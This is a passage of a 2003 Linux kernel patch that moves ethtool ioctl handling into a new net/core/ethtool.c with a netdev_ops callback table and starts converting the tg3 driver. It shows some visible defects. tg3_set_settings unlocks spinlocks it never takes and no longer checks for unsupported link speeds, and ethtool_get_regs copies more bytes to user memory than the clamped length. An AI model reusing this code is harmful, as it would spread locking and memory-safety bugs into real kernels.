-r1.14 netdevice.h --- include/linux/netdevice.h 2 Jul 2003 22:08:52 -0000 1.14 +++ include/linux/netdevice.h 9 Jul 2003 15:24:33 -0000 @@ -42,6 +42,7 @@ struct divert_blk; struct vlan_group; +struct netdev_ops; #define HAVE_ALLOC_NETDEV /* feature macro: alloc_xxxdev functions are available. 
*/ @@ -299,6 +300,8 @@ struct net_device * See for details. Jean II */ struct iw_handler_def * wireless_handlers; + struct netdev_ops *netdev_ops; + /* * This marks the end of the "visible" part of the structure. All * fields hereafter are internal to the system, and may change at @@ -484,6 +487,100 @@ struct packet_type struct list_head list; }; +/* Some generic methods drivers may use in their netops */ +u32 netdev_op_get_link(struct net_device *dev); +u32 netdev_op_get_tx_csum(struct net_device *dev); +u32 netdev_op_get_sg(struct net_device *dev); +int netdev_op_set_sg(struct net_device *dev, u32 data); + +struct ethtool_cmd; +struct ethtool_drvinfo; +struct ethtool_regs; +struct ethtool_wolinfo; +struct ethtool_eeprom; +struct ethtool_coalesce; +struct ethtool_ringparam; +struct ethtool_pauseparam; +struct ethtool_test; +struct ethtool_stats; + +/** + * &netdev_ops - Alter and report network device settings + * get_settings: Get device-specific settings + * set_settings: Set device-specific settings + * get_drvinfo: Report driver information + * get_regs: Get device registers + * get_wol: Report whether Wake-on-Lan is enabled + * set_wol: Turn Wake-on-Lan on or off + * get_msglevel: Report driver message level + * set_msglevel: Set driver message level + * nway_reset: Restart autonegotiation + * get_link: Get link status + * get_eeprom: Read data from the device EEPROM + * set_eeprom: Write data to the device EEPROM + * get_coalesce: Get interrupt coalescing parameters + * set_coalesce: Set interrupt coalescing parameters + * get_ringparam: Report ring sizes + * set_ringparam: Set ring sizes + * get_pauseparam: Report pause parameters + * set_pauseparam: Set pause parameters + * get_rx_csum: Report whether receive checksums are turned on or off + * set_rx_csum: Turn receive checksum on or off + * get_tx_csum: Report whether transmit checksums are turned on or off + * set_tx_csum: Turn transmit checksums on or off + * get_sg: Report whether scatter-gather is
enabled + * set_sg: Turn scatter-gather on or off + * self_test: Run specified self-tests + * get_strings: Return a set of strings that describe the requested objects + * phys_id: Identify the device + * get_stats: Return statistics about the device + * + * Description: + * + * Each operation is passed a &struct net_device as its first parameter. + * + * get_settings: + * @get_settings is passed an &ethtool_cmd to fill in. It returns + * a negative errno or zero. + * + * set_settings: + * @set_settings is passed an &ethtool_cmd and should attempt to set + * all the settings this device supports. It may return an error value + * if something goes wrong (otherwise 0). + */ +struct netdev_ops { + int (*get_settings)(struct net_device *, struct ethtool_cmd *); + int (*set_settings)(struct net_device *, struct ethtool_cmd *); + void (*get_drvinfo)(struct net_device *, struct ethtool_drvinfo *); + int (*get_regs_len)(struct net_device *); + void (*get_regs)(struct net_device *, struct ethtool_regs *, void *); + void (*get_wol)(struct net_device *, struct ethtool_wolinfo *); + int (*set_wol)(struct net_device *, struct ethtool_wolinfo *); + u32 (*get_msglevel)(struct net_device *); + void (*set_msglevel)(struct net_device *, u32); + int (*nway_reset)(struct net_device *); + u32 (*get_link)(struct net_device *); + int (*get_eeprom)(struct net_device *, struct ethtool_eeprom *); + int (*set_eeprom)(struct net_device *, struct ethtool_eeprom *); + int (*get_coalesce)(struct net_device *, struct ethtool_coalesce *); + int (*set_coalesce)(struct net_device *, struct ethtool_coalesce *); + void (*get_ringparam)(struct net_device *, struct ethtool_ringparam *); + int (*set_ringparam)(struct net_device *, struct ethtool_ringparam *); + void (*get_pauseparam)(struct net_device *, struct ethtool_pauseparam*); + int (*set_pauseparam)(struct net_device *, struct ethtool_pauseparam*); + u32 (*get_rx_csum)(struct net_device *); + int (*set_rx_csum)(struct net_device *, u32); + u32
(*get_tx_csum)(struct net_device *); + int (*set_tx_csum)(struct net_device *, u32); + u32 (*get_sg)(struct net_device *); + int (*set_sg)(struct net_device *, u32); + int (*self_test_count)(struct net_device *); + void (*self_test)(struct net_device *, struct ethtool_test *, u64 *); + void (*get_strings)(struct net_device *, u32 stringset, u8 *); + void (*phys_id)(struct net_device *, u32); + int (*get_stats_count)(struct net_device *); + void (*get_stats)(struct net_device *, struct ethtool_stats *, u64 *); +}; #include #include @@ -633,6 +730,7 @@ extern int netif_rx(struct sk_buff *skb #define HAVE_NETIF_RECEIVE_SKB 1 extern int netif_receive_skb(struct sk_buff *skb); extern int dev_ioctl(unsigned int cmd, void *); +extern int dev_ethtool(struct ifreq *); extern unsigned dev_get_flags(const struct net_device *); extern int dev_change_flags(struct net_device *, unsigned); extern int dev_set_mtu(struct net_device *, int); Index: net/socket.c =================================================================== RCS file: /var/cvs/linux-2.5/net/socket.c,v retrieving revision 1.21 diff -u -p -r1.21 socket.c --- net/socket.c 17 Jun 2003 11:54:29 -0000 1.21 +++ net/socket.c 17 Jun 2003 11:57:20 -0000 @@ -74,7 +74,6 @@ #include #include #include -#include #include #include #include @@ -1916,10 +1915,7 @@ int sock_unregister(int family) extern void sk_init(void); - -#ifdef CONFIG_WAN_ROUTER extern void wanrouter_init(void); -#endif void __init sock_init(void) { Index: net/core/Makefile =================================================================== RCS file: /var/cvs/linux-2.5/net/core/Makefile,v retrieving revision 1.9 diff -u -p -r1.9 Makefile --- net/core/Makefile 27 May 2003 17:29:33 -0000 1.9 +++ net/core/Makefile 4 Jun 2003 18:39:01 -0000 @@ -10,8 +10,8 @@ obj-y += sysctl_net_core.o endif endif -obj-$(CONFIG_NET) += flow.o dev.o net-sysfs.o dev_mcast.o dst.o neighbour.o \ - rtnetlink.o utils.o link_watch.o filter.o +obj-$(CONFIG_NET) += flow.o dev.o ethtool.o 
net-sysfs.o dev_mcast.o dst.o \ + neighbour.o rtnetlink.o utils.o link_watch.o filter.o obj-$(CONFIG_NETFILTER) += netfilter.o obj-$(CONFIG_NET_DIVERT) += dv.o Index: net/core/dev.c =================================================================== RCS file: /var/cvs/linux-2.5/net/core/dev.c,v retrieving revision 1.22 diff -u -p -r1.22 dev.c --- net/core/dev.c 2 Jul 2003 22:08:58 -0000 1.22 +++ net/core/dev.c 8 Jul 2003 15:36:35 -0000 @@ -2224,6 +2224,36 @@ int dev_set_mtu(struct net_device *dev, return err; } +/* These are all netdev_op methods in case a driver needs to do something + * different. If we find that all drivers want to do the same thing here, + * we can turn them into dev_() function calls. + */ + +u32 netdev_op_get_link(struct net_device *dev) +{ + return netif_carrier_ok(dev) ? 1 : 0; +} + +u32 netdev_op_get_tx_csum(struct net_device *dev) +{ + return (dev->features & NETIF_F_IP_CSUM) != 0; +} + +u32 netdev_op_get_sg(struct net_device *dev) +{ + return (dev->features & NETIF_F_SG) != 0; +} + +int netdev_op_set_sg(struct net_device *dev, u32 data) +{ + if (data) + dev->features |= NETIF_F_SG; + else + dev->features &= ~NETIF_F_SG; + + return 0; +} + /* * Perform the SIOCxIFxxx calls. @@ -2364,7 +2394,6 @@ static int dev_ifsioc(struct ifreq *ifr, cmd == SIOCBONDSLAVEINFOQUERY || cmd == SIOCBONDINFOQUERY || cmd == SIOCBONDCHANGEACTIVE || - cmd == SIOCETHTOOL || cmd == SIOCGMIIPHY || cmd == SIOCGMIIREG || cmd == SIOCSMIIREG || @@ -2461,13 +2490,26 @@ int dev_ioctl(unsigned int cmd, void *ar } return ret; + case SIOCETHTOOL: + dev_load(ifr.ifr_name); + rtnl_lock(); + ret = dev_ethtool(&ifr); + rtnl_unlock(); + if (!ret) { + if (colon) + *colon = ':'; + if (copy_to_user(arg, &ifr, + sizeof(struct ifreq))) + ret = -EFAULT; + } + return ret; + /* * These ioctl calls: * - require superuser power. * - require strict serialization. 
* - return a value */ - case SIOCETHTOOL: case SIOCGMIIPHY: case SIOCGMIIREG: if (!capable(CAP_NET_ADMIN)) Index: net/core/ethtool.c =================================================================== RCS file: net/core/ethtool.c diff -N net/core/ethtool.c --- /dev/null 1 Jan 1970 00:00:00 -0000 +++ net/core/ethtool.c 9 Jul 2003 16:04:26 -0000 @@ -0,0 +1,585 @@ +/* + * net/core/ethtool.c - Ethtool ioctl handler + * Split from net/core/dev.c by Matthew Wilcox + * The only entry point in this file is dev_ethtool() and its only caller + * is from net/core/dev.c + * + * It's GPL, stupid. + */ + +#include +#include +#include + +static int ethtool_get_settings(struct net_device *dev, void *useraddr) +{ + struct ethtool_cmd cmd = { ETHTOOL_GSET }; + int err; + + if (!dev->netdev_ops->get_settings) + return -EOPNOTSUPP; + + err = dev->netdev_ops->get_settings(dev, &cmd); + if (err < 0) + return err; + + if (copy_to_user(useraddr, &cmd, sizeof(cmd))) + return -EFAULT; + return 0; +} + +static int ethtool_set_settings(struct net_device *dev, void *useraddr) +{ + struct ethtool_cmd cmd; + + if (!dev->netdev_ops->set_settings) + return -EOPNOTSUPP; + + if (copy_from_user(&cmd, useraddr, sizeof(cmd))) + return -EFAULT; + + return dev->netdev_ops->set_settings(dev, &cmd); +} + +static int ethtool_get_drvinfo(struct net_device *dev, void *useraddr) +{ + struct ethtool_drvinfo info; + struct netdev_ops *ops = dev->netdev_ops; + + if (!ops->get_drvinfo) + return -EOPNOTSUPP; + + memset(&info, 0, sizeof(info)); + info.cmd = ETHTOOL_GDRVINFO; + ops->get_drvinfo(dev, &info); + + if (ops->self_test_count) + info.testinfo_len = ops->self_test_count(dev); + if (ops->get_stats_count) + info.n_stats = ops->get_stats_count(dev); + if (ops->get_regs_len) + info.regdump_len = ops->get_regs_len(dev); + + if (copy_to_user(useraddr, &info, sizeof(info))) + return -EFAULT; + return 0; +} + +static int ethtool_get_regs(struct net_device *dev, char *useraddr) +{ + struct ethtool_regs regs; + struct 
netdev_ops *ops = dev->netdev_ops; + void *regbuf; + int reglen, ret; + + if (!ops->get_regs || !ops->get_regs_len) + return -EOPNOTSUPP; + + if (copy_from_user(&regs, useraddr, sizeof(regs))) + return -EFAULT; + + reglen = ops->get_regs_len(dev); + if (regs.len > reglen) + regs.len = reglen; + + regbuf = kmalloc(reglen, GFP_KERNEL); + if (!regbuf) + return -ENOMEM; + + ops->get_regs(dev, &regs, regbuf); + + ret = -EFAULT; + if (copy_to_user(useraddr, &regs, sizeof(regs))) + goto out; + useraddr += offsetof(struct ethtool_regs, data); + if (copy_to_user(useraddr, regbuf, reglen)) + goto out; + ret = 0; + + out: + kfree(regbuf); + return ret; +} + +static int ethtool_get_wol(struct net_device *dev, char *useraddr) +{ + struct ethtool_wolinfo wol = { ETHTOOL_GWOL }; + + if (!dev->netdev_ops->get_wol) + return -EOPNOTSUPP; + + dev->netdev_ops->get_wol(dev, &wol); + + if (copy_to_user(useraddr, &wol, sizeof(wol))) + return -EFAULT; + return 0; +} + +static int ethtool_set_wol(struct net_device *dev, char *useraddr) +{ + struct ethtool_wolinfo wol; + + if (!dev->netdev_ops->set_wol) + return -EOPNOTSUPP; + + if (copy_from_user(&wol, useraddr, sizeof(wol))) + return -EFAULT; + + return dev->netdev_ops->set_wol(dev, &wol); +} + +static int ethtool_get_msglevel(struct net_device *dev, char *useraddr) +{ + struct ethtool_value edata = { ETHTOOL_GMSGLVL }; + + if (!dev->netdev_ops->get_msglevel) + return -EOPNOTSUPP; + + edata.data = dev->netdev_ops->get_msglevel(dev); + + if (copy_to_user(useraddr, &edata, sizeof(edata))) + return -EFAULT; + return 0; +} + +static int ethtool_set_msglevel(struct net_device *dev, char *useraddr) +{ + struct ethtool_value edata; + + if (!dev->netdev_ops->set_msglevel) + return -EOPNOTSUPP; + + if (copy_from_user(&edata, useraddr, sizeof(edata))) + return -EFAULT; + + dev->netdev_ops->set_msglevel(dev, edata.data); + return 0; +} + +static int ethtool_nway_reset(struct net_device *dev) +{ + if (!dev->netdev_ops->nway_reset) + return -EOPNOTSUPP; + +
return dev->netdev_ops->nway_reset(dev); +} + +static int ethtool_get_link(struct net_device *dev, void *useraddr) +{ + struct ethtool_value edata = { ETHTOOL_GLINK }; + + if (!dev->netdev_ops->get_link) + return -EOPNOTSUPP; + + edata.data = dev->netdev_ops->get_link(dev); + + if (copy_to_user(useraddr, &edata, sizeof(edata))) + return -EFAULT; + return 0; +} + +static int ethtool_get_eeprom(struct net_device *dev, void *useraddr) +{ + struct ethtool_eeprom eeprom = { ETHTOOL_GEEPROM }; + + if (!dev->netdev_ops->get_eeprom) + return -EOPNOTSUPP; + + dev->netdev_ops->get_eeprom(dev, &eeprom); + + if (copy_to_user(useraddr, &eeprom, sizeof(eeprom))) + return -EFAULT; + return 0; +} + +static int ethtool_set_eeprom(struct net_device *dev, void *useraddr) +{ + struct ethtool_eeprom eeprom; + + if (!dev->netdev_ops->set_eeprom) + return -EOPNOTSUPP; + + if (copy_from_user(&eeprom, useraddr, sizeof(eeprom))) + return -EFAULT; + + return dev->netdev_ops->set_eeprom(dev, &eeprom); +} + +static int ethtool_get_coalesce(struct net_device *dev, void *useraddr) +{ + struct ethtool_coalesce coalesce = { ETHTOOL_GCOALESCE }; + + if (!dev->netdev_ops->get_coalesce) + return -EOPNOTSUPP; + + dev->netdev_ops->get_coalesce(dev, &coalesce); + + if (copy_to_user(useraddr, &coalesce, sizeof(coalesce))) + return -EFAULT; + return 0; +} + +static int ethtool_set_coalesce(struct net_device *dev, void *useraddr) +{ + struct ethtool_coalesce coalesce; + + if (!dev->netdev_ops->set_coalesce) + return -EOPNOTSUPP; + + if (copy_from_user(&coalesce, useraddr, sizeof(coalesce))) + return -EFAULT; + + return dev->netdev_ops->set_coalesce(dev, &coalesce); +} + +static int ethtool_get_ringparam(struct net_device *dev, void *useraddr) +{ + struct ethtool_ringparam ringparam = { ETHTOOL_GRINGPARAM }; + + if (!dev->netdev_ops->get_ringparam) + return -EOPNOTSUPP; + + dev->netdev_ops->get_ringparam(dev, &ringparam); + + if (copy_to_user(useraddr, &ringparam, sizeof(ringparam))) + return -EFAULT; +
return 0; +} + +static int ethtool_set_ringparam(struct net_device *dev, void *useraddr) +{ + struct ethtool_ringparam ringparam; + + if (!dev->netdev_ops->set_ringparam) + return -EOPNOTSUPP; + + if (copy_from_user(&ringparam, useraddr, sizeof(ringparam))) + return -EFAULT; + + return dev->netdev_ops->set_ringparam(dev, &ringparam); +} + +static int ethtool_get_pauseparam(struct net_device *dev, void *useraddr) +{ + struct ethtool_pauseparam pauseparam = { ETHTOOL_GPAUSEPARAM }; + + if (!dev->netdev_ops->get_pauseparam) + return -EOPNOTSUPP; + + dev->netdev_ops->get_pauseparam(dev, &pauseparam); + + if (copy_to_user(useraddr, &pauseparam, sizeof(pauseparam))) + return -EFAULT; + return 0; +} + +static int ethtool_set_pauseparam(struct net_device *dev, void *useraddr) +{ + struct ethtool_pauseparam pauseparam; + + if (!dev->netdev_ops->set_pauseparam) + return -EOPNOTSUPP; + + if (copy_from_user(&pauseparam, useraddr, sizeof(pauseparam))) + return -EFAULT; + + return dev->netdev_ops->set_pauseparam(dev, &pauseparam); +} + +static int ethtool_get_rx_csum(struct net_device *dev, char *useraddr) +{ + struct ethtool_value edata = { ETHTOOL_GRXCSUM }; + + if (!dev->netdev_ops->get_rx_csum) + return -EOPNOTSUPP; + + edata.data = dev->netdev_ops->get_rx_csum(dev); + + if (copy_to_user(useraddr, &edata, sizeof(edata))) + return -EFAULT; + return 0; +} + +static int ethtool_set_rx_csum(struct net_device *dev, char *useraddr) +{ + struct ethtool_value edata; + + if (!dev->netdev_ops->set_rx_csum) + return -EOPNOTSUPP; + + if (copy_from_user(&edata, useraddr, sizeof(edata))) + return -EFAULT; + + dev->netdev_ops->set_rx_csum(dev, edata.data); + return 0; +} + +static int ethtool_get_tx_csum(struct net_device *dev, char *useraddr) +{ + struct ethtool_value edata = { ETHTOOL_GTXCSUM }; + + if (!dev->netdev_ops->get_tx_csum) + return -EOPNOTSUPP; + + edata.data = dev->netdev_ops->get_tx_csum(dev); + + if (copy_to_user(useraddr, &edata, sizeof(edata))) + return -EFAULT; + return
0; +} + +static int ethtool_set_tx_csum(struct net_device *dev, char *useraddr) +{ + struct ethtool_value edata; + + if (!dev->netdev_ops->set_tx_csum) + return -EOPNOTSUPP; + + if (copy_from_user(&edata, useraddr, sizeof(edata))) + return -EFAULT; + + return dev->netdev_ops->set_tx_csum(dev, edata.data); +} + +static int ethtool_get_sg(struct net_device *dev, char *useraddr) +{ + struct ethtool_value edata = { ETHTOOL_GSG }; + + if (!dev->netdev_ops->get_sg) + return -EOPNOTSUPP; + + edata.data = dev->netdev_ops->get_sg(dev); + + if (copy_to_user(useraddr, &edata, sizeof(edata))) + return -EFAULT; + return 0; +} + +static int ethtool_set_sg(struct net_device *dev, char *useraddr) +{ + struct ethtool_value edata; + + if (!dev->netdev_ops->set_sg) + return -EOPNOTSUPP; + + if (copy_from_user(&edata, useraddr, sizeof(edata))) + return -EFAULT; + + return dev->netdev_ops->set_sg(dev, edata.data); +} + +static int ethtool_self_test(struct net_device *dev, char *useraddr) +{ + struct ethtool_test test; + struct netdev_ops *ops = dev->netdev_ops; + u64 *data; + int ret; + + if (!ops->self_test || !ops->self_test_count) + return -EOPNOTSUPP; + + if (copy_from_user(&test, useraddr, sizeof(test))) + return -EFAULT; + + test.len = ops->self_test_count(dev); + data = kmalloc(test.len * sizeof(u64), GFP_KERNEL); + if (!data) + return -ENOMEM; + + ops->self_test(dev, &test, data); + + ret = -EFAULT; + if (copy_to_user(useraddr, &test, sizeof(test))) + goto out; + useraddr += sizeof(test); + if (copy_to_user(useraddr, data, test.len * sizeof(u64))) + goto out; + ret = 0; + + out: + kfree(data); + return ret; +} + +static int ethtool_get_strings(struct net_device *dev, void *useraddr) +{ + struct ethtool_gstrings gstrings; + struct netdev_ops *ops = dev->netdev_ops; + u8 *data; + int ret; + + if (!ops->get_strings) + return -EOPNOTSUPP; + + if (copy_from_user(&gstrings, useraddr, sizeof(gstrings))) + return -EFAULT; + + switch (gstrings.string_set) { + case ETH_SS_TEST: + if 
(!ops->self_test_count) + return -EOPNOTSUPP; + gstrings.len = ops->self_test_count(dev); + break; + case ETH_SS_STATS: + if (!ops->get_stats_count) + return -EOPNOTSUPP; + gstrings.len = ops->get_stats_count(dev); + break; + default: + return -EINVAL; + } + + data = kmalloc(gstrings.len * ETH_GSTRING_LEN, GFP_KERNEL); + if (!data) + return -ENOMEM; + + ops->get_strings(dev, gstrings.string_set, data); + + ret = -EFAULT; + if (copy_to_user(useraddr, &gstrings, sizeof(gstrings))) + goto out; + useraddr += sizeof(gstrings); + if (copy_to_user(useraddr, data, gstrings.len * ETH_GSTRING_LEN)) + goto out; + ret = 0; + + out: + kfree(data); + return ret; +} + +static int ethtool_phys_id(struct net_device *dev, void *useraddr) +{ + struct ethtool_value id; + + if (!dev->netdev_ops->phys_id) + return -EOPNOTSUPP; + + if (copy_from_user(&id, useraddr, sizeof(id))) + return -EFAULT; + + dev->netdev_ops->phys_id(dev, id.data); + return 0; +} + +static int ethtool_get_stats(struct net_device *dev, void *useraddr) +{ + struct ethtool_stats stats; + struct netdev_ops *ops = dev->netdev_ops; + u64 *data; + int ret; + + if (!ops->get_stats || !ops->get_stats_count) + return -EOPNOTSUPP; + + if (copy_from_user(&stats, useraddr, sizeof(stats))) + return -EFAULT; + + stats.n_stats = ops->get_stats_count(dev); + data = kmalloc(stats.n_stats * sizeof(u64), GFP_KERNEL); + if (!data) + return -ENOMEM; + + ops->get_stats(dev, &stats, data); + + ret = -EFAULT; + if (copy_to_user(useraddr, &stats, sizeof(stats))) + goto out; + useraddr += sizeof(stats); + if (copy_to_user(useraddr, data, stats.n_stats * sizeof(u64))) + goto out; + ret = 0; + + out: + kfree(data); + return ret; +} + +int dev_ethtool(struct ifreq *ifr) +{ + struct net_device *dev = __dev_get_by_name(ifr->ifr_name); + void *useraddr = (void *) ifr->ifr_data; + u32 ethcmd; + + /* XXX: We can make this more finegrained now. Keep existing + * behaviour for the moment.
+ */ + if (!capable(CAP_NET_ADMIN)) + return -EPERM; + + if (!dev || !netif_device_present(dev)) + return -ENODEV; + + if (!dev->netdev_ops) + goto ioctl; + + if (copy_from_user (&ethcmd, useraddr, sizeof (ethcmd))) + return -EFAULT; + + switch (ethcmd) { + case ETHTOOL_GSET: + return ethtool_get_settings(dev, useraddr); + case ETHTOOL_SSET: + return ethtool_set_settings(dev, useraddr); + case ETHTOOL_GDRVINFO: + return ethtool_get_drvinfo(dev, useraddr); + case ETHTOOL_GREGS: + return ethtool_get_regs(dev, useraddr); + case ETHTOOL_GWOL: + return ethtool_get_wol(dev, useraddr); + case ETHTOOL_SWOL: + return ethtool_set_wol(dev, useraddr); + case ETHTOOL_GMSGLVL: + return ethtool_get_msglevel(dev, useraddr); + case ETHTOOL_SMSGLVL: + return ethtool_set_msglevel(dev, useraddr); + case ETHTOOL_NWAY_RST: + return ethtool_nway_reset(dev); + case ETHTOOL_GLINK: + return ethtool_get_link(dev, useraddr); + case ETHTOOL_GEEPROM: + return ethtool_get_eeprom(dev, useraddr); + case ETHTOOL_SEEPROM: + return ethtool_set_eeprom(dev, useraddr); + case ETHTOOL_GCOALESCE: + return ethtool_get_coalesce(dev, useraddr); + case ETHTOOL_SCOALESCE: + return ethtool_set_coalesce(dev, useraddr); + case ETHTOOL_GRINGPARAM: + return ethtool_get_ringparam(dev, useraddr); + case ETHTOOL_SRINGPARAM: + return ethtool_set_ringparam(dev, useraddr); + case ETHTOOL_GPAUSEPARAM: + return ethtool_get_pauseparam(dev, useraddr); + case ETHTOOL_SPAUSEPARAM: + return ethtool_set_pauseparam(dev, useraddr); + case ETHTOOL_GRXCSUM: + return ethtool_get_rx_csum(dev, useraddr); + case ETHTOOL_SRXCSUM: + return ethtool_set_rx_csum(dev, useraddr); + case ETHTOOL_GTXCSUM: + return ethtool_get_tx_csum(dev, useraddr); + case ETHTOOL_STXCSUM: + return ethtool_set_tx_csum(dev, useraddr); + case ETHTOOL_GSG: + return ethtool_get_sg(dev, useraddr); + case ETHTOOL_SSG: + return ethtool_set_sg(dev, useraddr); + case ETHTOOL_TEST: + return ethtool_self_test(dev, useraddr); + case ETHTOOL_GSTRINGS: + return
ethtool_get_strings(dev, useraddr); + case ETHTOOL_PHYS_ID: + return ethtool_phys_id(dev, useraddr); + case ETHTOOL_GSTATS: + return ethtool_get_stats(dev, useraddr); + default: + return -EOPNOTSUPP; + } + + ioctl: + if (dev->do_ioctl) + return dev->do_ioctl(dev, ifr, SIOCETHTOOL); + return -EOPNOTSUPP; +} + Index: drivers/net/tg3.c =================================================================== RCS file: /var/cvs/linux-2.5/drivers/net/tg3.c,v retrieving revision 1.16 diff -u -p -r1.16 tg3.c --- drivers/net/tg3.c 14 Jun 2003 22:15:21 -0000 1.16 +++ drivers/net/tg3.c 9 Jul 2003 14:33:19 -0000 @@ -5036,16 +5036,20 @@ static void tg3_set_rx_mode(struct net_d #define TG3_REGDUMP_LEN (32 * 1024) -static u8 *tg3_get_regs(struct tg3 *tp) +static int tg3_get_regs_len(struct net_device *dev) { - u8 *orig_p = kmalloc(TG3_REGDUMP_LEN, GFP_KERNEL); - u8 *p; + return TG3_REGDUMP_LEN; +} + +static void tg3_get_regs(struct net_device *dev, struct ethtool_regs *regs, void *p) +{ + struct tg3 *tp = dev->priv; + u8 *orig_p = p; int i; - if (orig_p == NULL) - return NULL; + regs->version = 0; - memset(orig_p, 0, TG3_REGDUMP_LEN); + memset(p, 0, TG3_REGDUMP_LEN); spin_lock_irq(&tp->lock); spin_lock(&tp->tx_lock); @@ -5099,390 +5103,287 @@ do { p = orig_p + (reg); \ spin_unlock(&tp->tx_lock); spin_unlock_irq(&tp->lock); - - return orig_p; } -static int tg3_ethtool_ioctl (struct net_device *dev, void *useraddr) +static int tg3_get_settings(struct net_device *dev, struct ethtool_cmd *cmd) { struct tg3 *tp = dev->priv; - struct pci_dev *pci_dev = tp->pdev; - u32 ethcmd; - if (copy_from_user (&ethcmd, useraddr, sizeof (ethcmd))) - return -EFAULT; - - switch (ethcmd) { - case ETHTOOL_GDRVINFO:{ - struct ethtool_drvinfo info = { ETHTOOL_GDRVINFO }; - strcpy (info.driver, DRV_MODULE_NAME); - strcpy (info.version, DRV_MODULE_VERSION); - memset(&info.fw_version, 0, sizeof(info.fw_version)); - strcpy (info.bus_info, pci_dev->slot_name); - info.eedump_len = 0; - info.regdump_len =
TG3_REGDUMP_LEN; - if (copy_to_user (useraddr, &info, sizeof (info))) - return -EFAULT; - return 0; - } + if (!(tp->tg3_flags & TG3_FLAG_INIT_COMPLETE) || + tp->link_config.phy_is_low_power) + return -EAGAIN; + + cmd->supported = (SUPPORTED_Autoneg); + + if (!(tp->tg3_flags & TG3_FLAG_10_100_ONLY)) + cmd->supported |= (SUPPORTED_1000baseT_Half | + SUPPORTED_1000baseT_Full); + + if (tp->phy_id != PHY_ID_SERDES) + cmd->supported |= (SUPPORTED_100baseT_Half | + SUPPORTED_100baseT_Full | + SUPPORTED_10baseT_Half | + SUPPORTED_10baseT_Full | + SUPPORTED_MII); + else + cmd->supported |= SUPPORTED_FIBRE; - case ETHTOOL_GSET: { - struct ethtool_cmd cmd = { ETHTOOL_GSET }; + cmd->advertising = tp->link_config.advertising; + cmd->speed = tp->link_config.active_speed; + cmd->duplex = tp->link_config.active_duplex; + cmd->port = 0; + cmd->phy_address = PHY_ADDR; + cmd->transceiver = 0; + cmd->autoneg = tp->link_config.autoneg; + cmd->maxtxpkt = 0; + cmd->maxrxpkt = 0; + return 0; +} - if (!(tp->tg3_flags & TG3_FLAG_INIT_COMPLETE) || - tp->link_config.phy_is_low_power) - return -EAGAIN; - cmd.supported = (SUPPORTED_Autoneg); - - if (!(tp->tg3_flags & TG3_FLAG_10_100_ONLY)) - cmd.supported |= (SUPPORTED_1000baseT_Half | - SUPPORTED_1000baseT_Full); - - if (tp->phy_id != PHY_ID_SERDES) - cmd.supported |= (SUPPORTED_100baseT_Half | - SUPPORTED_100baseT_Full | - SUPPORTED_10baseT_Half | - SUPPORTED_10baseT_Full | - SUPPORTED_MII); - else - cmd.supported |= SUPPORTED_FIBRE; +static int tg3_set_settings(struct net_device *dev, struct ethtool_cmd *cmd) +{ + struct tg3 *tp = dev->priv; - cmd.advertising = tp->link_config.advertising; - cmd.speed = tp->link_config.active_speed; - cmd.duplex = tp->link_config.active_duplex; - cmd.port = 0; - cmd.phy_address = PHY_ADDR; - cmd.transceiver = 0; - cmd.autoneg = tp->link_config.autoneg; - cmd.maxtxpkt = 0; - cmd.maxrxpkt = 0; - if (copy_to_user(useraddr, &cmd, sizeof(cmd))) - return -EFAULT; - return 0; + if (!(tp->tg3_flags & 
TG3_FLAG_INIT_COMPLETE) || + tp->link_config.phy_is_low_power) + return -EAGAIN; + + if (cmd->autoneg == AUTONEG_ENABLE) { + tp->link_config.advertising = cmd->advertising; + tp->link_config.speed = SPEED_INVALID; + tp->link_config.duplex = DUPLEX_INVALID; + } else { + tp->link_config.speed = cmd->speed; + tp->link_config.duplex = cmd->duplex; } - case ETHTOOL_SSET: { - struct ethtool_cmd cmd; - if (!(tp->tg3_flags & TG3_FLAG_INIT_COMPLETE) || - tp->link_config.phy_is_low_power) - return -EAGAIN; - - if (copy_from_user(&cmd, useraddr, sizeof(cmd))) - return -EFAULT; - - /* Fiber PHY only supports 1000 full/half */ - if (cmd.autoneg == AUTONEG_ENABLE) { - if (tp->phy_id == PHY_ID_SERDES && - (cmd.advertising & - (ADVERTISED_10baseT_Half | - ADVERTISED_10baseT_Full | - ADVERTISED_100baseT_Half | - ADVERTISED_100baseT_Full))) - return -EINVAL; - if ((tp->tg3_flags & TG3_FLAG_10_100_ONLY) && - (cmd.advertising & - (ADVERTISED_1000baseT_Half | - ADVERTISED_1000baseT_Full))) - return -EINVAL; - } else { - if (tp->phy_id == PHY_ID_SERDES && - (cmd.speed == SPEED_10 || - cmd.speed == SPEED_100)) - return -EINVAL; - if ((tp->tg3_flags & TG3_FLAG_10_100_ONLY) && - (cmd.speed == SPEED_10 || - cmd.speed == SPEED_100)) - return -EINVAL; - } - - spin_lock_irq(&tp->lock); - spin_lock(&tp->tx_lock); - - tp->link_config.autoneg = cmd.autoneg; - if (cmd.autoneg == AUTONEG_ENABLE) { - tp->link_config.advertising = cmd.advertising; - tp->link_config.speed = SPEED_INVALID; - tp->link_config.duplex = DUPLEX_INVALID; - } else { - tp->link_config.speed = cmd.speed; - tp->link_config.duplex = cmd.duplex; - } + tg3_setup_phy(tp); + spin_unlock(&tp->tx_lock); + spin_unlock_irq(&tp->lock); - tg3_setup_phy(tp); - spin_unlock(&tp->tx_lock); - spin_unlock_irq(&tp->lock); + return 0; +} - return 0; - } +static void tg3_get_drvinfo(struct net_device *dev, struct ethtool_drvinfo *info) +{ + struct tg3 *tp = dev->priv; - case ETHTOOL_GREGS: { - struct ethtool_regs regs; - u8 *regbuf; - int ret; - - 
if (copy_from_user(&regs, useraddr, sizeof(regs))) - return -EFAULT; - if (regs.len > TG3_REGDUMP_LEN) - regs.len = TG3_REGDUMP_LEN; - regs.version = 0; - if (copy_to_user(useraddr, &regs, sizeof(regs))) - return -EFAULT; - - regbuf = tg3_get_regs(tp); - if (!regbuf) - return -ENOMEM; - - useraddr += offsetof(struct ethtool_regs, data); - ret = 0; - if (copy_to_user(useraddr, regbuf, regs.len)) - ret = -EFAULT; - kfree(regbuf); - return ret; - } - case ETHTOOL_GWOL: { - struct ethtool_wolinfo wol = { ETHTOOL_GWOL }; - - wol.supported = WAKE_MAGIC; - wol.wolopts = 0; - if (tp->tg3_flags & TG3_FLAG_WOL_ENABLE) - wol.wolopts = WAKE_MAGIC; - memset(&wol.sopass, 0, sizeof(wol.sopass)); - if (copy_to_user(useraddr, &wol, sizeof(wol))) - return -EFAULT; - return 0; - } - case ETHTOOL_SWOL: { - struct ethtool_wolinfo wol; + strcpy(info->driver, DRV_MODULE_NAME); + strcpy(info->version, DRV_MODULE_VERSION); + strcpy(info->bus_info, pci_name(tp->pdev)); +} - if (copy_from_user(&wol, useraddr, 